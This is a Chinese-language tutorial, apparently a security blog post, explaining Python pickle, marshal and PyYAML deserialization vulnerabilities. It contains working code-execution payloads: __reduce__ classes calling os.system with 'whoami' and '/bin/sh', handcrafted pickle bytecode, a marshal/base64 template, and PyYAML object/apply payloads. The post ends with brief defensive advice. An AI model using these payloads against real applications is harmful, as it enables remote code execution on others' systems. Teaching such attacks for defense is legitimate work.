MARK = b'(' # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call setstate<\/strong> or dict<\/strong>.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding<\/p>

TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py<\/p>

Protocol 2<\/h1>
PROTO = b'\x80' # identify pickle protocol
NEWOBJ = b'\x81' # build object by applying cls.new<\/strong> to argtuple
EXT1 = b'\x82' # push object from extension registry; 1-byte index
EXT2 = b'\x83' # ditto, but 2-byte index
EXT4 = b'\x84' # ditto, but 4-byte index
TUPLE1 = b'\x85' # build 1-tuple from stack top
TUPLE2 = b'\x86' # build 2-tuple from two topmost stack items
TUPLE3 = b'\x87' # build 3-tuple from three topmost stack items
NEWTRUE = b'\x88' # push True
NEWFALSE = b'\x89' # push False
LONG1 = b'\x8a' # push long from < 256 bytes
LONG4 = b'\x8b' # push really big long<\/p>
_tuplesize2code = [EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3]<\/p>
Protocol 3 (Python 3.x)<\/h1>
BINBYTES = b'B' # push bytes; counted binary string argument
SHORT_BINBYTES = b'C' # " " ; " " " " < 256 bytes<\/p>
Protocol 4<\/h1>
SHORT_BINUNICODE = b'\x8c' # push short string; UTF-8 length < 256 bytes
BINUNICODE8 = b'\x8d' # push very long string
BINBYTES8 = b'\x8e' # push very long bytes string
EMPTY_SET = b'\x8f' # push empty set on the stack
ADDITEMS = b'\x90' # modify set by adding topmost stack items
FROZENSET = b'\x91' # build frozenset from topmost stack items
NEWOBJ_EX = b'\x92' # like NEWOBJ but work with keyword only arguments
STACK_GLOBAL = b'\x93' # same as GLOBAL but using names on the stacks
MEMOIZE = b'\x94' # store top of the stack in memo
FRAME = b'\x95' # indicate the beginning of a new frame<\/p>
Protocol 5<\/h1>
BYTEARRAY8 = b'\x96' # push bytearray
NEXT_BUFFER = b'\x97' # push next out-of-band buffer
READONLY_BUFFER = b'\x98' # make top of stack readonly上文谈到了opcode是有多个版本的, 在进行序列化时可以通过protocol=num来选择opcode的版本, 指定的版本必须小于等于5.import os
import pickle
class Demo():
def init<\/strong>(self, name='h3rmesk1t'):
self.name = name
def reduce<\/strong>(self):
return (os.system, ('whoami',))
demo = Demo()
for i in range(6):
print('[+] pickle v{}: {}'.format(str(i), pickle.dumps(demo, protocol=i)))
[+] pickle v0: b'cposix\nsystem\np0\n(Vwhoami\np1\ntp2\nRp3\n.'
[+] pickle v1: b'cposix\nsystem\nq\x00(X\x06\x00\x00\x00whoamiq\x01tq\x02Rq\x03.'
[+] pickle v2: b'\x80\x02cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
[+] pickle v3: b'\x80\x03cposix\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
[+] pickle v4: b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'
[+] pickle v5: b'\x80\x05\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'基本模式:c<module>
<callable>
(<args>
tR.这里用一段简短的字节码来演示利用过程:cos
system
(S'whoami'
tR.上文中的字节码其实就是import<\/strong>('os').system(('whoami',)), 下面来分解分析一下:cos => 引入模块 os.
system => 引用 system, 并将其添加到 stack.
(S'whoami' => 把当前 stack 存到 metastack, 清空 stack, 再将 'whoami' 压入 stack.
t => stack 中的值弹出并转为 tuple, 把 metastack 还原到 stack, 再将 tuple 压入 stack.
R => system(<\/em>('whoami',)).
. => 结束并返回当前栈顶元素.需要注意的是, 并不是所有的对象都能使用pickle进行序列化和反序列化, 例如文件对象和网络套接字对象以及代码对象就不可以.漏洞利用方式漏洞产生的原因在于其可以将自定义的类进行序列化和反序列化, 反序列化后产生的对象会在结束时触发reduce<\/strong>()函数从而触发恶意代码.简单来说, reduce<\/strong>()魔术方法类似于PHP中的__wakeup()方法, 在反序列化时会先调用reduce<\/strong>()魔术方法.如果返回值是一个字符串, 那么将会去当前作用域中查找字符串值对应名字的对象, 将其序列化之后返回.如果返回值是一个元组, 要求是2到6个参数(Python3.8新加入元组的第六项).第一个参数是可调用的对象.第二个是该对象所需的参数元组, 如果可调用对象不接受参数则必须提供一个空元组.第三个是用于表示对象的状态的可选元素, 将被传给前述的setstate<\/strong>()方法, 如果对象没有此方法, 则这个元素必须是字典类型并会被添加至dict<\/strong>属性中.第四个是用于返回连续项的迭代器的可选元素.第五个是用于返回连续键值对的迭代器的可选元素.第六个是一个带有(obj, state)签名的可调用对象的可选元素基本 Payloadimport os
import pickle
class Demo(object):
def reduce<\/strong>(self):
shell = '\/bin\/sh'
return (os.system,(shell,))
demo = Demo()
pickle.loads(pickle.dumps(demo))Marshal 反序列化由于pickle无法序列化code对象, 因此在python2.6后增加了一个marshal模块来处理code对象的序列化问题.import base64
import marshal<\/p>
def demo():
import os
os.system('\/bin\/sh')<\/p>
code_serialized = base64.b64encode(marshal.dumps(demo()))
print(code_serialized)但是marshal不能直接使用reduce<\/strong>, 因为reduce是利用调用某个callable并传递参数来执行的, 而marshal函数本身就是一个callable, 需要执行它, 而不是将他作为某个函数的参数.这时候就要利用上面分析的那个PVM操作码来进行构造了, 先写出来需要执行的内容, Python能通过types.FunctionTyle(func_code,globals(),'')()来动态地创建匿名函数, 这一部分的内容可以看官方文档的介绍.结合上文的示例代码, 最重要执行的是: (types.FunctionType(marshal.loads(base64.b64decode(code_enc)), globals(), ''))().这里直接贴一下别的师傅给出来的Payload模板.import base64
import pickle
import marshal<\/p>
def foo():
import os
os.system('whoami;\/bin\/sh') # evil code<\/p>
shell = """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRcbuiltin
globals
(tRS''
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))<\/p>
print(pickle.loads(shell))PyYAML 反序列化漏洞点找到yaml\/constructor.py文件, 查看文件代码中的三个特殊Python标签的源码:!!python\/object标签.!!python\/object\/new标签.!!python\/object\/apply标签.这三个Python标签中都是调用了make_python_instance函数, 跟进查看该函数. 可以看到, 在该函数是会根据参数来动态创建新的Python类对象或通过引用module的类创建对象, 从而可以执行任意命令.Payload(PyYaml < 5.1)!!python\/object\/apply:os.system ["calc.exe"]
!!python\/object\/new:os.system ["calc.exe"]
!!python\/object\/new:subprocess.check_output [["calc.exe"]]
!!python\/object\/apply:subprocess.check_output [["calc.exe"]]Pyload(PyYaml >= 5.1)from yaml import *
data = b"""!!python\/object\/apply:subprocess.Popen - calc"""
deserialized_data = load(data, Loader=Loader)
print(deserialized_data)from yaml import *
data = b"""!!python\/object\/apply:subprocess.Popen<\/p>

calc"""
deserialized_data = unsafe_load(data)
print(deserialized_data)防御方法采用用更高级的接口__getnewargs()、getstate<\/strong>()、setstate<\/strong>()等代替reduce<\/strong>()魔术方法.进行反序列化操作之前进行严格的过滤, 若采用的是pickle库可采用装饰器实现.参考链接：https:\/\/xz.aliyun.com\/t\/11082<\/li> <\/ul>